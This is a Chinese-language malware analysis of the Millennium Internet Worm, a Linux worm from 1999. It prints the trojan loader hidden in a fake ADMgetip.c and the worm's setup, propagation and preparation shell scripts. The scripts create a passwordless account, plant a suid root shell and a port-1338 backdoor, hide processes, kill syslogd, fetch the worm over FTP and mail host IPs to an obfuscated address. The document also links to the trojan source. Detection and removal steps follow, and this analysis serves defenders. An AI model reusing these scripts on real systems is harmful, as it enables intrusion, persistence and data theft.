千年蠕蟲(The Millennium Internet Worm)——後面簡稱worm,是一段script及程序組成的,它執行的功能是利用linux系統的某些遠程漏洞,獲取該系統的進入權限,並且將自身復制到其上並繼續繁殖。現在發現的worm是針對x86的linux中imap4v10.X,Qualcomm popper, bind , rpc.mountd 這些存在明顯漏洞的服務進攻的。但它也做了一件好事——修補了安全漏洞……
二、技術分析
我們最早發現的蠕蟲據稱是在ADMmountd2的遠程漏洞利用程序中的(這個程序是對linux的rpc.mountd服務進行攻擊並可獲取最高權限——這裡不詳述),但ADM組織否認曾經發布過帶有該特洛伊程序的代碼,並將其歸類於假冒ADM作品,可以參見ftp://adm.freelsd.net/ADM/FAKES/ maintained by [email protected]].
這個木馬是放在ADMmountd的所謂更新版本中,並在措詞中表明這一版本的利用程序更為實用,但其實隱蔽的代碼就躲在ADMgetip.c中,ADM在其站點限制了對這一工具的下載,所以這裡我把它提供給大家,僅僅是用於教育目的——這一木馬於1999-8-15被發現。
你可以在http://focus.silversand.net/newsite/tool/adm_fake.c下載ADMgetip-TROJAN-VERSION.c。
1、原型
該代碼段中有一段mworm.tgz的uuencode代碼,當運行該程序時,它會被展開於目錄/var/tmp/tmp,並且執行一個名為wormup的程序,代碼段如下:
//Trojan Code from ADMgetip.c
FILE *fp=fopen("/var/tmp/tmp","w"); //打開文件 if(getuid()!=0) { fprintf(stderr,"operation not permitted\n"); exit(0); } //檢查uid是否為root fprintf(fp,"begin-base64 644 mworm.tgz H4sIANpU/TYAA+xaD3CUx3XfOx1wHALEHxts4/hDRrYE0vHdSQJkgQsIYWhk UCSQHSM4n+6+4ztxujvfHypiuwEr1DqEYsWeTp1MUhOctEnr6biMnSbFY8vA YNyBlGB3ShonZVy3ORmSIZgabMtcf293v7vvOwk7k4k7k5l8o3f7vd23b9++ ... [ large uuencoded mworm.tgz here ] emgL0uE1iuMHR6u1MaA8jUhjOHm2+OzzGLqoNLv0SRpBuNS6XmDYdwe6Z55f bYCEt3q80+XpdMU1NM8J2FDCra2crXTRduAMD0Johcwe8ODFVzDnnwNKJcF8 ivJ+7s3IgAEDBgwYMGDAgAEDBgwYMGDAgAEDPxS+AlHjZQIA+AIA ====\n"); //這是一段很長的uuecoded過的代碼 system("( cd /var/tmp;uudecode < tmp ; sleep 1; tar xzvf mworm.tgz;\ ./wormup ) >/dev/null 2>/dev/null &"); //解碼並執行wormup程序
注意如果權限並非root的話,是無法繼續的,該mworm.tgz展開後有如下文件:
Directory of /var/tmp
-rw-r--r-- 1 root root 51564 Aug 17 22:21 mworm.tgz -rwxr-xr-x 1 root root 8647 Dec 31 1999 Hnamed* -rwxr-xr-x 1 root root 5173 Dec 31 1999 Hnamed.c* -rwxr-xr-x 1 root root 477 Dec 31 1999 IP* -rwxr-xr-x 1 root root 1728 Dec 31 1999 README-ADMINS* -rwxr-xr-x 1 root root 5749 Dec 31 1999 bd* -rwxr-xr-x 1 root root 1340 Dec 31 1999 bd.c* -rwxr-xr-x 1 root root 0 Dec 31 1999 cmd* -rwxr-xr-x 1 root root 5292 Dec 31 1999 ftpscan* -rwxr-xr-x 1 root root 911 Dec 31 1999 ftpscan.c* -rwxr-xr-x 1 root root 8750 Dec 31 1999 ftpx* -rwxr-xr-x 1 root root 5108 Dec 31 1999 ftpx.c* -rwxr-xr-x 1 root root 2398 Dec 31 1999 getip.c* -rwxr-xr-x 1 root root 6436 Dec 31 1999 im* -rwxr-xr-x 1 root root 2634 Dec 31 1999 im.c* -rwxr-xr-x 1 root root 151 Dec 31 1999 infect* -rwxr-xr-x 1 root root 1 Dec 31 1999 infected* -rwxr-xr-x 1 root root 2755 Dec 31 1999 ip_icmp.h* -rwxr-xr-x 1 root root 6175 Dec 31 1999 mount.h* -rwxr-xr-x 1 root root 5152 Dec 31 1999 mount.x* -rwxr-xr-x 1 root root 2222 Dec 31 1999 mount_clnt.c* -rwxr-xr-x 1 root root 3178 Dec 31 1999 mount_svc.c* -rwxr-xr-x 1 root root 2366 Dec 31 1999 mount_xdr.c* -rwxr-xr-x 1 root root 13048 Dec 31 1999 mountd* -rwxr-xr-x 1 root root 7723 Dec 31 1999 mountd.c* -rwxr-xr-x 1 root root 668 Dec 31 1999 mwd* -rwxr-xr-x 1 root root 561 Dec 31 1999 mwd-ftp* -rwxr-xr-x 1 root root 448 Dec 31 1999 mwd-imap* -rwxr-xr-x 1 root root 355 Dec 31 1999 mwd-mountd* -rwxr-xr-x 1 root root 529 Dec 31 1999 mwd-pop* -rwxr-xr-x 1 root root 755 Dec 31 1999 mwi* -rwxr-xr-x 1 root root 844 Dec 31 1999 mworm* -rwxr-xr-x 1 root root 4617 Dec 31 1999 mwr* -rwxr-xr-x 1 root root 407 Dec 31 1999 mwr.c* -rwxr-xr-x 1 root root 5849 Dec 31 1999 mws* -rwxr-xr-x 1 root root 1522 Dec 31 1999 mws.c* -rwxr-xr-x 1 root root 1439 Dec 31 1999 pgp* -rwxr-xr-x 1 root root 1226 Dec 31 1999 prepare* -rwxr-xr-x 1 root root 5430 Dec 31 1999 q* -rwxr-xr-x 1 root root 1350 Dec 31 1999 q.c* -rwxr-xr-x 1 root root 6785 Dec 31 1999 qp* -rwxr-xr-x 1 root root 2886 Dec 31 1999 qp.c* -rwxr-xr-x 1 root root 5680 Dec 31 1999 remotecmd* -rwxr-xr-x 1 root root 1834 Dec 31 1999 remotecmd.c* -rwxr-xr-x 1 root root 7286 Dec 31 1999 test* -rwxr-xr-x 1 root root 4355 Dec 31 1999 test.c* -rwxr-xr-x 1 root root 1037 Dec 31 1999 wormup*
在該文件展開後,第一件事就是執行wormup代碼,內容如下:
# cat wormup
#!/bin/sh # MILLENNIUM WORM SETUP SCRIPT # ./wormup -dist = create a new build # ./wormup & = install the worm (root) if [ x$1 = "x-dist" ] then echo "Creating Millennium Worm distribution." indent *.c rm -f *~ echo -n "Compiling: " for C in Hnamed q bd im qp ftpscan mwr remotecmd ftpx mws test do rm -f $C gcc -Wall -O2 ${C}.c -o $C echo -n $C" " done rm -f mountd r***en -C mount.x && gcc -Wall -O2 mountd.c -o mountd \ >/dev/null 2>/dev/null echo "mountd ..done" echo -n "Fixing misc. file stuff... " printf "" > cmd printf "0" > infected chmod 755 * touch -t 010100002000.00 * echo "done." rm -f mworm.tgz tar czf mworm.tgz * echo "Finished. mworm.tgz recreated." exit 0 fi if [ $UID != 0 ] ; then echo You need root to screw up this machine, sorry. exit 0 fi cp /bin/sh /bin/.mwsh && chmod 4755 /bin/.mwsh mkdir /tmp/.... && cp mworm.tgz /tmp/.... echo mw::2222:555:millennium worm:/:/bin/sh >>/etc/passwd cd /tmp/.... && tar xzvf mworm.tgz ./mworm >/dev/null 2>/dev/null & echo "Millennium Worm(tm). Phear thy unix like thyself."
這段代碼做了以下幾件事情
刪除並且重新編譯worm.tgz裡的二進制文件。 准備通過網絡感染的程序 給cmd文件清零,以便稍候使用 給infected文件清零,用來充當counter 將所有文件的許可權限設為755 將所有文件的時間戳設為2000-1-1, 00:00:00 重新將mworm.tgz這家伙打好包放在/var/tmp中
2、在本地機器上的行為
當它被安裝於機器中時,該蠕蟲會運行wormup腳本執行下面的工作:
建立一個沒有密碼的帳號mw 拷貝一個suid的root shell到/tmp/.mwsh 發動蠕蟲
在蠕蟲發動後,會有下列情況發生:
蠕蟲會把自己加在/etc/rc.d/rc.local以及/etc/profile中將系統的IP地址發送到[email protected]這個email地址,通過隨意地掃描並攻擊網絡其它主機,將自身復制到上面
3、在網絡中的行為
任何被獲得了root權限並安裝了蠕蟲的機器都會被激活並參與展開進攻感染行為,需要記住,該腳本有一 個-dist的選項並沒有被馬上使用到,首先我們先看它做什麼:
建立一個suid的root shell/tmp/.mwsh 在/etc/passwd中加入一個名為mw,uid為2222,密碼為空的帳號 將mworm.tgz展開到/tmp/... 執行mworm
#cat .mworm
#!/bin/.mwsh # Millennium Worm by Anonymous # If you found this on your machine, but didn't download it # well.. you have a problem :) export PATH="/bin/:/usr/sbin/:/usr/bin:/sbin:/usr/local/bin:." export IP_A=`./IP`
./prepare for your d00m mortalz
cat cmd mw mw mw mw mw /bin/.mwsh -c "/usr/sbin/named" & export PATH="/bin/:/usr/sbin/:/usr/bin:/sbin:/usr/local/bin:." mkdir /tmp/.... cd /tmp/.... if [ -f /tmp/.X12 ] then logout fi ftp $IP_A mw
cd /tmp/.... get mworm.tgz bye tar xvzf mworm.tgz touch /tmp/.X12 nohup ./mworm & ./IP | mail `printf "\x74\x72\x61\x78\x33\x31\x33\x33\x37\x40\ \x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"` logout _EOF_
./mwd & ./mwd-pop & ./mwd-imap & ./mwd-mountd & ./mwd-ftp & sleep 60 nohup ./mwd & nohup ./mwd-pop & nohup ./mwd-imap & nohup ./mwd-mountd & nohup ./mwd-ftp &
/bin/.mwsh -c ./bd
這段腳本看來是這個worm的核心所在了,它執行下面功能:
運行准備好的腳本——附於下面 建立一個cmd腳本——是將對目標機器執行的命令 發送email——包含該主機的IP地址——到[email protected] 發動守護進程mwd, mwd-pop, mwd-imap, mwd-mountd, and mwd-ftp 運行bd,這是一個後門,綁定端口1338並允許在收到驗證密碼為millennium後以root身份進入。
#cat prepare
#!/bin/.mwsh # Millennium Worm Preparation File # This sets up the stuff to make sure your # machine will be owned in a neat and proper way ;D
export PATH="/bin/:/usr/sbin/:/usr/bin:/sbin:/usr/local/bin:."
if [ -f /bin/.ps ] then printf "" else ./README-ADMINS >/dev/null 2>/dev/null & mv /bin/ps /bin/.ps;echo "/bin/.ps \$* | grep -v ps | grep -v mw | \ grep -v grep" >> /bin/ps ; chmod 755 /bin/ps if [ -f /etc/rc.d/rc.local ] then echo "( sleep 10 ; cd /tmp/..../ ; ./mworm ) >>/dev/null & " \ >> /etc/rc.d/rc.local else echo "( sleep 10 ; cd /tmp/..../ ; ./mworm ) >>/dev/null & " \ >> /etc/profile fi chattr +ia /tmp/..../*.c /tmp/..../mwd* /tmp/..../prepare /bin/.mwsh chattr +ia /etc/rc.d/rc.local /etc/profile /tmp/..../mwo* /tmp/..../IP chattr -ia /tmp/..../mount_*.c fi
killall -q -9 syslogd
gcc -Wall -O2 Hnamed.c -o Hnamed gcc -Wall -O2 mwr.c -o mwr gcc -Wall -O2 q.c -o q gcc -Wall -O2 remotecmd.c -o remotecmd gcc -Wall -O2 test.c -o test gcc -Wall -O2 bd.c -o bd gcc -Wall -O2 im.c -o im gcc -Wall -O2 qp.c -o qp gcc -Wall -O2 mws.c -o mws gcc -Wall -O2 ftpscan.c -o ftpscan gcc -Wall -O2 ftpx.c -o ftpx rpc=`which r***en` which r***en && $rpc -C mount.x && gcc -Wall -O2 mountd.c -o mountd
/bin/.mwsh -c ./bd &
不用多說了,這段腳本執行了下面的工作:
運行了"README-ADMINS",將主機弄安全些。 將ps用假的替換掉,以便隱藏該worm 將自己加到系統開始時的rc文件中 將worm的文件變為不可更改,不可刪除——但root可以用chattr來改變 殺掉syslogd 運行bd,打開1338的root shell允許遠程root以millennium密碼登入
三、刪除蠕蟲
1、檢測主機:
/etc/passwd中有一個密碼為空的mw帳號 /tmp/.mwsh存在並且是一個suid的root shell /tmp/....夾存在並且裡面有worm的一些文件 /etc/rc.d/rc.local的文件被更改並且放入了mworm,以便自啟動 /etc/profile文件被更改 syslogd進程莫名其妙地終止了 mountd被停掉了 dns服務被過濾掉 qpop和imap被升級了;) /etc/hosts.deny和/etc/hosts.allow被清空 下面的進程在跑.mwsh, mworm, Hnamed, remotecmd, mwd, mwd-ftp, mwd-imap, mwd-pop, mwd-mountd, ps ("bd" 的後門偽裝成的ps)
2、檢查網絡:
有email外發至[email protected] 有名為mw的用戶從ftpd服務登入或者收到mworm.tgz文件 (這兩個檢測並不一定准確,因為syslogd被停了,如果有設代理的話則可能在代理的記錄裡可能找到) tcp連接到端口1338——綁定的後門 從53端口的外發信息——可能是bind漏洞攻擊 從110端口的外發信息——可能是qpopper漏洞攻擊 從143端口的外發信息——可能是imapd漏洞攻擊 從635端口的外發信息——可能是rpc.mountd漏洞的攻擊 從23端口的外發信息——可能是worm在通過remotecmd散布
3、預防
升級——worm是利用系統的遠程漏洞獲得roo權限才能攻擊的,如果升級到最新的版本,就不會存在這些特殊而且明顯的漏洞了,那麼也就有效地將worm阻於門外,不過要記住,任何一個攻擊者都可以輕易地將這個worm稍加更改用於現在的系統,現在的漏洞,來攻擊你現在的機器;),所以最的的辦法只能是關注網絡安全;)
紅帽子的用戶可以到http://www.redhat.com/errata/獲取相關信息
4、修復
如果已經被worm感染的話,要修復它是很容易的,你只需要:
刪除suid的root shell[/bin/rm -rf /tmp/.mwsh] 停止運行中的worm進程[/usr/bin/killall -9 mworm] 去除在mworm文件上的寫保護標記[/usr/bin/chattr -R -ia /tmp/....] 刪除worm文件[/bin/rm -rf /tmp/....] 將正常的ps文件拷回去[/bin/cp /bin/.ps /bin/ps]——最好重新build一個吧;) 將mw用戶從/etc/passwd中移除[/usr/sbin/userdel -r mw] 將worm的自啟動的東西從/etc/rc.d/rc.local及/etc/profile中刪除 殺掉bd的後門的進程,如果你已經刪掉了worm的文件,重新啟動就可以去掉它了
如果你已經被worm所感染的話,那至少表明你的系統曾經完全地被別人擁有過,他有能力對系統做任何事,所以僅僅殺掉worm的進程,刪除其文件,刪除mw的用戶等工作僅僅是去掉了一些公式化的東西,所以不能保證你的機器裡還有些什麼新奇有趣的後門或者其它東西,最好的辦法——還是關注安全……
